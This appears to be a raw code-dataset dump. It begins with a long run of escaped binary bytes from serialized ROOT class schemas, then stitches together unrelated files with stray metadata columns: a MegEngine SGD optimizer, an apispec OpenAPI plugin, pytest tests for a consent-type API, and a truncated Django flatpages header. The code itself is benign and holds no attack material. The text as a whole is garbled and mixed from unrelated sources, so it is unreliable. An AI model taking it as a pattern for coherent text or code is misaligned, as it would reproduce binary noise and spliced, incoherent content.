list\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\xc5\xc3\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05\x00@\x00\x00\xc6\x80\x00\x00[@\x00\x00\xbe\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TList\x00i\xc5\xc3\xbb\x00\x00\x00\x05@\x00\x00\x99\x80\x00\x00\x9b@\x00\x00\x91\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00x\x80\x00\x00\xc6@\x00\x00p\x00\x03@\x00\x00f\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0eTSeqCollection\x1bSequenceable collection ABC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfcl;\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x00\x00@\x00\x00\xcf\x80\x00\x00[@\x00\x00\xc7\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0eTSeqCollection\x00\xfcl;\xc6\x00\x00\x00\x00@\x00\x00\x99\x80\x00\x00\x9b@\x00\x00\x91\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00x\x80\x00\x00\xc6@\x00\x00p\x00\x03@\x00\x00f\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bTCollection\x1eCollection abstract base 
class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\xe3\xcb\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03\x00@\x00\x01\x9b\x80\x00\x00[@\x00\x01\x93\x00\t@\x00\x00\x19\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0bTCollection\x00W\xe3\xcb\x9c\x00\x00\x00\x03@\x00\x01h\x80\x00\x00\x9b@\x00\x01`\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00i\x80\x00\x01?@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fName\x16name of the collection\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fSize number of elements in collection\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x00L\x80\x00\x00[@\x00\x00D\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TString\x00\x00\x01t\x19\x00\x00\x00\x02@\x00\x00\x1d\x80\x00\x00\x9b@\x00\x00\x15\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x03\xfc\x80\x00\x00[@\x00\x03\xf4\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTProfile2D\x006\xa1B\xac\x00\x00\x00\x07@\x00\x03\xca\x80\x00\x00\x9b@\x00\x03\xc2\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH2D)2-Dim histograms (one double per channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xba\x82\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03@\x00\x00r\x80\x00\x08\xbf@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fZmin\x19Lower limit in Z (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fZmax\x19Upper limit in Z (if 
set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwz\x15Total Sum of weight*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwz2\x17Total Sum of weight*Z*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD\x00@\x00\x01#\x80\x00\x00[@\x00\x01\x1b\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2D\x00\x7f\xba\x82\xf0\x00\x00\x00\x03@\x00\x00\xf7\x80\x00\x00\x9b@\x00\x00\xef\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayD\x10Array of doubles\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q9\xef4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x02n\x80\x00\x00[@\x00\x02f\x00\t@\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x03TH2\x00\x01\x824\x7f\x00\x00\x00\x04@\x00\x02C\x80\x00\x00\x9b@\x00\x02;\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfScalefactor\x0cScale factor\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwy\x15Total Sum of weight*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwy2\x17Total Sum of 
weight*Y*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwxy\x17Total Sum of weight*X*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x03\xfc\x80\x00\x00[@\x00\x03\xf4\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTProfile3D\x00\xf6\x0ch\x14\x00\x00\x00\x07@\x00\x03\xca\x80\x00\x00\x9b@\x00\x03\xc2\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH3D)3-Dim histograms (one double per channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xb9\xff\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03@\x00\x00r\x80\x00\x08\xbf@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fTmin\x19Lower limit in T (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fTmax\x19Upper limit in T (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwt\x15Total Sum of weight*T\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwt2\x17Total Sum of weight*T*T\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per 
[Binary payload: serialized ROOT TStreamerInfo records (escaped bytes, not human-readable). The recoverable information is the set of on-disk class schemas they describe: TArrayD, TH3/TH3D, TH1, TAtt3D; the STL wrappers vector<int>, vector<double>, vector<float>, vector<long>, vector<char>, vector<short>, vector<string>; TTree, TBranch, TBranchElement, TBranchRef, ROOT::TIOFeatures; TLeaf and its typed variants (TLeafI, TLeafD, TLeafF, TLeafL, TLeafB, TLeafS, TLeafO, TLeafC, TLeafElement); TRefTable, TObjArray, TGraph, TMultiGraph; the histogram classes TH1C/TH1S/TH1I/TH1F, TH2C/TH2S/TH2I/TH2F, TH3C/TH3S/TH3I/TH3F with their storage bases TArrayC/TArrayS/TArrayI/TArrayF; followed by a TList ("listOfRules") of TObjString schema-evolution rules for TProfile, TProfile2D, TProfile3D, and TTree.]
| 3,301.714286
| 112,866
| 0.753496
|
183820dab2ad545bf5eb8fa9a33051bfb4c7bde0
| 3,384
|
py
|
Python
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | 23
|
2021-12-08T02:35:01.000Z
|
2022-03-16T02:23:19.000Z
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | 4
|
2021-12-23T11:31:17.000Z
|
2022-02-28T01:35:31.000Z
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
import os
from typing import Iterable, Union
from megengine import Parameter, tensor
from megengine.functional.inplace import _inplace_add_
from megengine.optimizer import Optimizer
class SGD(Optimizer):
r"""Implements stochastic gradient descent.
Nesterov momentum is based on the formula from
`"On the importance of initialization and momentum in deep learning"
<http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf>`_.
Args:
params: iterable of parameters to optimize or dicts defining parameter groups.
lr: learning rate.
momentum: momentum factor. Default: ``0.0``
nesterov: enables Nesterov momentum. Default: ``False``
weight_decay: weight decay (L2 penalty). Default: ``0.0``
"""
def __init__(
self,
params: Union[Iterable[Parameter], dict],
lr: float,
momentum: float = 0.0,
nesterov: bool = False,
weight_decay: float = 0.0,
):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if nesterov and momentum <= 0:
raise ValueError("Nesterov momentum requires a momentum")
defaults = dict(lr=lr, momentum=momentum, weight_decay=weight_decay)
super().__init__(params, defaults)
self.nesterov = nesterov
self._disable_type_convert = True
def _create_state(self, param_group):
if param_group["momentum"] != 0.0:
for param in param_group["params"]:
self._add_state(param, "momentum_buffer")
def _updates(self, param_group):
lr = param_group["lr"]
weight_decay = param_group["weight_decay"]
momentum = param_group["momentum"]
        # since `convert_inputs` is disabled for param updates,
        # scalars must be explicitly converted to tensors
_lr = tensor(lr)
_weight_decay = tensor(weight_decay)
_momentum = tensor(momentum)
inplace_mode = int(os.getenv("MEGENGINE_INPLACE_UPDATE", "0"))
if inplace_mode:
_neg_lr = tensor(-lr)
c1 = tensor([1.0])
for param in param_group["params"]:
if param.grad is None:
continue
grad = param.grad
if weight_decay != 0.0:
grad = grad + param * _weight_decay
if inplace_mode:
if momentum != 0.0:
v = self._state[param]["momentum_buffer"]
_inplace_add_(v, grad, alpha=_momentum, beta=c1)
if self.nesterov:
grad = grad + v * _momentum
else:
grad = v
_inplace_add_(param, grad, alpha=c1, beta=_neg_lr)
continue
if momentum != 0.0:
v = self._state[param]["momentum_buffer"]
v *= _momentum
v += grad
if self.nesterov:
grad = grad + v * _momentum
else:
grad = v
param -= _lr * grad
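# A minimal usage sketch (hypothetical names: assumes a MegEngine module ``model``,
# an autodiff GradManager ``gm`` attached to its parameters, and input ``x``):
#
#   opt = SGD(model.parameters(), lr=0.1, momentum=0.9, nesterov=True, weight_decay=1e-4)
#   with gm:
#       loss = model(x).mean()
#       gm.backward(loss)
#   opt.step()
#   opt.clear_grad()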
| 34.530612
| 86
| 0.577423
|
5add3cdbc9a8f36b3ef4743317dd198ed05cf5a5
| 8,552
|
py
|
Python
|
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | 3
|
2019-02-25T05:15:39.000Z
|
2020-11-26T02:56:10.000Z
|
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | null | null | null |
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | null | null | null |
from apispec import BasePlugin
from apispec.exceptions import DuplicateComponentNameError
from apispec.yaml_utils import load_operations_from_docstring
from schematics.contrib.enum_type import EnumType
from schematics.models import FieldDescriptor
from schematics.types import ModelType, DictType, ListType, BooleanType, EmailType, UUIDType, StringType, IntType
from schematics.undefined import UndefinedType
from registry.http.schematics.types import ArrowType, NameType
class DocStringPlugin(BasePlugin):
def __init__(self):
self.spec = None
def init_spec(self, spec):
super().init_spec(spec)
self.spec = spec
def operation_helper(self, path, operations, router, func, **kwargs):
new_operations = load_operations_from_docstring(func.__doc__)
if hasattr(func, '_cp_config') is False:
return None
cp_config = func._cp_config
if new_operations is not None:
for method, data in new_operations.items():
if cp_config.get('tools.authentication.on', True):
data['security'] = [
{'Bearer': []}
]
if 'tools.model_in.cls' in cp_config:
model_cls = cp_config['tools.model_in.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
except DuplicateComponentNameError:
pass
data['requestBody']['required'] = True
data['requestBody']['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + model_cls.__name__}
}
}
if 'tools.model_params.cls' in cp_config:
model_cls = cp_config['tools.model_params.cls']
data['parameters'] = data.get('parameters', [])
# In query vs in path
for key, obj in model_cls.__dict__.items():
inn = 'query'
if '{' + key + '}' in path:
inn = 'path'
                        if isinstance(obj, FieldDescriptor):
                            parameter = {
                                'name': key,
                                'in': inn,
                                'required': model_cls._fields[key].required,
                                'schema': parse_model_type(self.spec, model_cls._fields[key]),
                            }
                            if isinstance(model_cls._fields[key]._default, UndefinedType) is False:
                                parameter['schema']['default'] = model_cls._fields[key]._default
                            data['parameters'].append(parameter)
if 'tools.model_out.cls' in cp_config:
model_cls = cp_config['tools.model_out.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
except DuplicateComponentNameError:
pass
data['responses'][200]['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + model_cls.__name__}
}
}
if 'tools.model_out_pagination.cls' in cp_config:
model_cls = cp_config['tools.model_out_pagination.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
except DuplicateComponentNameError:
pass
self.spec.components.schema("List" + model_cls.__name__,
component={
'type': 'object',
'properties': {
path.split("/")[-1]: {
'type': 'array',
'items': {
'$ref': '#/components/schemas/' + model_cls.__name__}
},
path.split("/")[-1] + "_links": {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'href': {
'type': 'string'
},
'rel': {
'type': 'string'
}
}
}
}
},
})
data['responses'][200]['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + "List" + model_cls.__name__}
}
}
if 'tools.enforce_permission.permission_name' in cp_config:
data['x-required-permission'] = cp_config['tools.enforce_permission.permission_name']
operations.update(new_operations)
return None
def parse_model(spec, model_cls):
kwargs = {
'properties': {},
'type': 'object',
'required': [],
}
for key, obj in model_cls.__dict__.items():
if isinstance(obj, FieldDescriptor):
kwargs['properties'][key] = parse_model_type(spec, model_cls._fields[key])
if model_cls._fields[key].required:
kwargs['required'].append(key)
if len(kwargs['required']) == 0:
del kwargs['required']
return kwargs
def parse_model_type(spec, model_type):
swagger_types = {
StringType: 'string',
NameType: 'string',
UUIDType: 'string',
EmailType: 'string',
EnumType: 'string',
ArrowType: 'string',
IntType: 'integer',
BooleanType: 'boolean',
ListType: 'array',
DictType: 'object',
ModelType: 'object',
}
data = {
# Find the swagger type, if not found default to string
        # It would be nice to have complex types like uuid, emails, etc.
# But swagger doesn't support it
"type": swagger_types.get(model_type.__class__, "string")
}
if model_type.__class__ == EnumType:
data['enum'] = [x.value for x in model_type.enum_class]
if model_type.__class__ == ListType:
if model_type.field.__class__ == ModelType:
try:
spec.components.schema(model_type.field.model_class.__name__,
component=parse_model(spec, model_type.field.model_class))
except DuplicateComponentNameError:
pass
data['items'] = {
'$ref': '#/components/schemas/' + model_type.field.model_class.__name__
}
else:
data['items'] = parse_model_type(spec, model_type.field)
if model_type.__class__ == DictType:
data['additionalProperties'] = parse_model_type(spec, model_type.field)
if model_type.__class__ == ModelType:
try:
spec.components.schema(model_type.model_class.__name__, component=parse_model(spec, model_type.model_class))
except DuplicateComponentNameError:
pass
data['additionalProperties'] = {
'$ref': '#/components/schemas/' + model_type.model_class.__name__
}
return data
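# A hedged registration sketch (the APISpec arguments below are illustrative, not
# taken from this file):
#
#   from apispec import APISpec
#   spec = APISpec(title="tf-registry", version="1.0.0", openapi_version="3.0.2",
#                  plugins=[DocStringPlugin()])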
| 43.632653
| 120
| 0.450889
|
dfcd27f0e3f17eee342ca1d024f5c9c1933d8cf6
| 4,251
|
py
|
Python
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 3
|
2021-11-27T18:03:31.000Z
|
2022-02-06T21:47:59.000Z
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 13
|
2021-11-03T18:15:06.000Z
|
2022-03-27T22:28:38.000Z
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 8
|
2021-11-16T04:07:41.000Z
|
2022-03-14T14:51:34.000Z
|
from ..utils import Endpoint
endpoint = Endpoint()
def test_post_consent_type():
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
data = {
"name": "test-name",
"description": "test-description",
"revokable": False,
"default_value": "deny",
"enabled": False,
"tags": ["tag1", "tag2", "tag3"],
"required": False,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
data = {
"name": "test-name",
"description": "test-description",
"revokable": False,
"default_value": "incorrect_data",
"enabled": False,
"tags": ["tag1", "tag2", "tag3"],
"required": False,
"auto_revoke": "incorrect_data"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert "detail" in result
assert result["detail"][0]["loc"][1] == "default_value"
assert result["detail"][1]["loc"][1] == "auto_revoke"
endpoint.delete("/consent/type/test-name")
def test_get_consent_type_id():
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.get("/consent/type/test-name")
result = result.json()
assert "id" in result and result["id"] == "test-name"
endpoint.delete("/consent/type/test-name")
def test_delete_consent_type_id():
try:
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.delete("/consent/type/test-name")
result = result.json()
assert result == {"deleted": 1}
result = endpoint.delete("/consent/type/test-name")
result = result.json()
assert result == {"deleted": 0}
finally:
endpoint.delete("/consent/type/test-name")
def test_get_consents_type():
    # smoke test: just ensure the listing endpoint responds without raising
    result = endpoint.get("/consents/type")
def test_get_consents_type_enabled():
try:
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.get("/consents/type/enabled")
result = result.json()
assert {consent["enabled"] for consent in result["result"]} == {True}
finally:
endpoint.delete("/consent/type/test-name")
def test_put_consents_type_refresh():
    # smoke test: just ensure the refresh endpoint responds without raising
    result = endpoint.put("/consents/type/refresh")
def test_get_consents_type_by_tag():
    # smoke test: just ensure the by-tag endpoint responds without raising
    result = endpoint.get("/consents/type/by_tag")
| 25.153846
| 77
| 0.549988
|
306cc8d72a07e27308ba73c963f7379c9513c672
| 4,809
|
py
|
Python
|
cargo/flatpages/models.py
|
dalou/django-cargo
|
633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
cargo/flatpages/models.py
|
dalou/django-cargo
|
